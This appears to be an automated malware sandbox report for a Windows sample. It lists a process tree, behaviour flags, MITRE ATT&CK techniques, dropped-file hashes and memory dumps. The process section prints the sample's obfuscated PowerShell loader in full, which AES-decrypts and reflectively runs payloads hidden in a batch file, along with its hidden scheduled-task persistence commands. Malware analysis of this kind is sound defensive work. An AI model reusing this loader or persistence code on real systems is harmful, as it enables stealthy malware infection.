har](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1252

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1360

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1428

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1472

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2036

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2572

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:696

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2136

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:3056

C:\Windows\system32\net.exe
net file
3⤵
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
4⤵
PID:3492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3552

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_612_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_612.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3276

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_612.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:8

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_612.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2876

C:\Windows\SysWOW64\net.exe
net file
6⤵
- Suspicious use of WriteProcessMemory
PID:4792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 file
7⤵
PID:2008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_612.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_612.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:480

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:4744

C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe
"C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5060

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:2768

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
7⤵
- Executes dropped EXE
PID:244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3472

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3884

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4008

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4024

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4380

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1348

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4904

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3288

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4448

C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1908

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
5dc9a9599fb11ee70f9164d8fea15abf

SHA1
85faf41a206f3fa8b469609333558cf817df2cda

SHA256
3f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de

SHA512
499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
229c0a92ebbe835620db89a2a51d4e58

SHA1
947e4ea585c39e987e4c4332fcc95ff2e344a000

SHA256
3ec5266144479c44d3dab09d507a1e7cb99d4944bd8b7afbb8e59126233cdf92

SHA512
6fb7bc3237ea9eadc2da39051b737c2caf6ffe58fff0d62ac605e58913c13660ab55142824e8a4be9c3347353bf7c086ee84cd482e810e9fcce2086c1f42343a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4ish412.ebs.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.exe
Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe
Filesize
411KB

MD5
bc4535f575200446e698610c00e1483d

SHA1
78d990d776f078517696a2415375ac9ebdf5d49a

SHA256
88e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122

SHA512
a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_612.bat
Filesize
515KB

MD5
4c2a3be3d5c9464eb441677e41f44fd8

SHA1
c826034a0882d21a39056d745e88622ee9698343

SHA256
45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7

SHA512
ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_612.vbs
Filesize
115B

MD5
689d28377ba46179472661a33b94321a

SHA1
cfc638246241e4694e364a8c7ffa0e6fef3fe4e6

SHA256
04939dde6dd0a305d7d06ca18eff8f61e801b37234946403594bfe37be72ca29

SHA512
4b4d009d99d9b2a5063596c4ab1aea1ff65e9b512b708a5354f7554be2275884f31dc4839969a1c62fe6f953cebfb1a472f8001a192dcdd51f05c6dc83951ba5

Download Submit
memory/436-162-0x00000259D8A20000-0x00000259D8A4B000-memory.dmp

Filesize
172KB

Download
memory/436-163-0x00007FFADE390000-0x00007FFADE3A0000-memory.dmp

Filesize
64KB

Download
memory/436-156-0x00000259D8A20000-0x00000259D8A4B000-memory.dmp

Filesize
172KB

Download
memory/460-167-0x0000027669BA0000-0x0000027669BCB000-memory.dmp

Filesize
172KB

Download
memory/480-76-0x0000000004ED0000-0x0000000004EE2000-memory.dmp

Filesize
72KB

Download
memory/480-77-0x0000000007740000-0x000000000777C000-memory.dmp

Filesize
240KB

Download
memory/480-73-0x0000000007380000-0x00000000073EC000-memory.dmp

Filesize
432KB

Download
memory/480-74-0x0000000007490000-0x0000000007522000-memory.dmp

Filesize
584KB

Download
memory/644-129-0x000001FD250F0000-0x000001FD2511B000-memory.dmp

Filesize
172KB

Download
memory/644-130-0x00007FFADE390000-0x00007FFADE3A0000-memory.dmp

Filesize
64KB

Download
memory/644-123-0x000001FD250F0000-0x000001FD2511B000-memory.dmp

Filesize
172KB

Download
memory/644-122-0x000001FD250F0000-0x000001FD2511B000-memory.dmp

Filesize
172KB

Download
memory/644-121-0x000001FD250C0000-0x000001FD250E5000-memory.dmp

Filesize
148KB

Download
memory/700-141-0x00007FFADE390000-0x00007FFADE3A0000-memory.dmp

Filesize
64KB

Download
memory/700-134-0x0000024E46D90000-0x0000024E46DBB000-memory.dmp

Filesize
172KB

Download
memory/700-140-0x0000024E46D90000-0x0000024E46DBB000-memory.dmp

Filesize
172KB

Download
memory/996-152-0x00007FFADE390000-0x00007FFADE3A0000-memory.dmp

Filesize
64KB

Download
memory/996-145-0x000002948BDD0000-0x000002948BDFB000-memory.dmp

Filesize
172KB

Download
memory/996-151-0x000002948BDD0000-0x000002948BDFB000-memory.dmp

Filesize
172KB

Download
memory/1156-108-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1156-118-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1156-114-0x00007FFB1E300000-0x00007FFB1E509000-memory.dmp

Filesize
2.0MB

Download
memory/1156-113-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1156-111-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1156-115-0x00007FFB1C9A0000-0x00007FFB1CA5D000-memory.dmp

Filesize
756KB

Download
memory/1156-109-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1156-110-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2644-104-0x000002CDEED90000-0x000002CDEEDB2000-memory.dmp

Filesize
136KB

Download
memory/2644-106-0x00007FFB1E300000-0x00007FFB1E509000-memory.dmp

Filesize
2.0MB

Download
memory/2644-105-0x000002CDEF120000-0x000002CDEF14A000-memory.dmp

Filesize
168KB

Download
memory/2644-107-0x00007FFB1C9A0000-0x00007FFB1CA5D000-memory.dmp

Filesize
756KB

Download
memory/3276-35-0x0000000074560000-0x0000000074D11000-memory.dmp

Filesize
7.7MB

Download
memory/3276-26-0x0000000074560000-0x0000000074D11000-memory.dmp

Filesize
7.7MB

Download
memory/3276-36-0x0000000006250000-0x0000000006284000-memory.dmp

Filesize
208KB

Download
memory/3276-47-0x0000000006230000-0x000000000624E000-memory.dmp

Filesize
120KB

Download
memory/3276-38-0x0000000070750000-0x000000007079C000-memory.dmp

Filesize
304KB

Download
memory/3276-25-0x0000000074560000-0x0000000074D11000-memory.dmp

Filesize
7.7MB

Download
memory/3276-48-0x0000000006E50000-0x0000000006EF4000-memory.dmp

Filesize
656KB

Download
memory/3276-55-0x0000000074560000-0x0000000074D11000-memory.dmp

Filesize
7.7MB

Download
memory/3276-49-0x0000000074560000-0x0000000074D11000-memory.dmp

Filesize
7.7MB

Download
memory/3276-52-0x00000000071D0000-0x00000000071E1000-memory.dmp

Filesize
68KB

Download
memory/3276-51-0x0000000007240000-0x00000000072D6000-memory.dmp

Filesize
600KB

Download
memory/3276-50-0x0000000007030000-0x000000000703A000-memory.dmp

Filesize
40KB

Download
memory/3276-37-0x0000000074560000-0x0000000074D11000-memory.dmp

Filesize
7.7MB

Download
memory/3552-19-0x0000000008070000-0x00000000086EA000-memory.dmp

Filesize
6.5MB

Download
memory/3552-16-0x0000000006380000-0x00000000066D7000-memory.dmp

Filesize
3.3MB

Download
memory/3552-7-0x0000000006310000-0x0000000006376000-memory.dmp

Filesize
408KB

Download
memory/3552-6-0x0000000005B30000-0x0000000005B96000-memory.dmp

Filesize
408KB

Download
memory/3552-5-0x0000000005A90000-0x0000000005AB2000-memory.dmp

Filesize
136KB

Download
memory/3552-4-0x0000000074560000-0x0000000074D11000-memory.dmp

Filesize
7.7MB

Download
memory/3552-3-0x0000000005BF0000-0x000000000621A000-memory.dmp

Filesize
6.2MB

Download
memory/3552-2-0x0000000074560000-0x0000000074D11000-memory.dmp

Filesize
7.7MB

Download
memory/3552-1-0x0000000003450000-0x0000000003486000-memory.dmp

Filesize
216KB

Download
memory/3552-0-0x000000007456E000-0x000000007456F000-memory.dmp

Filesize
4KB

Download
memory/3552-17-0x0000000006810000-0x000000000682E000-memory.dmp

Filesize
120KB

Download
memory/3552-18-0x00000000068C0000-0x000000000690C000-memory.dmp

Filesize
304KB

Download
memory/3552-20-0x0000000006DF0000-0x0000000006E0A000-memory.dmp

Filesize
104KB

Download
memory/3552-75-0x0000000074560000-0x0000000074D11000-memory.dmp

Filesize
7.7MB

Download
memory/3552-21-0x0000000002FF0000-0x0000000002FF8000-memory.dmp

Filesize
32KB

Download
memory/3552-22-0x0000000007A90000-0x0000000007AF2000-memory.dmp

Filesize
392KB

Download
memory/3552-23-0x0000000009CA0000-0x000000000A246000-memory.dmp

Filesize
5.6MB

Download
memory/5060-95-0x0000000006C50000-0x0000000006C96000-memory.dmp

Filesize
280KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads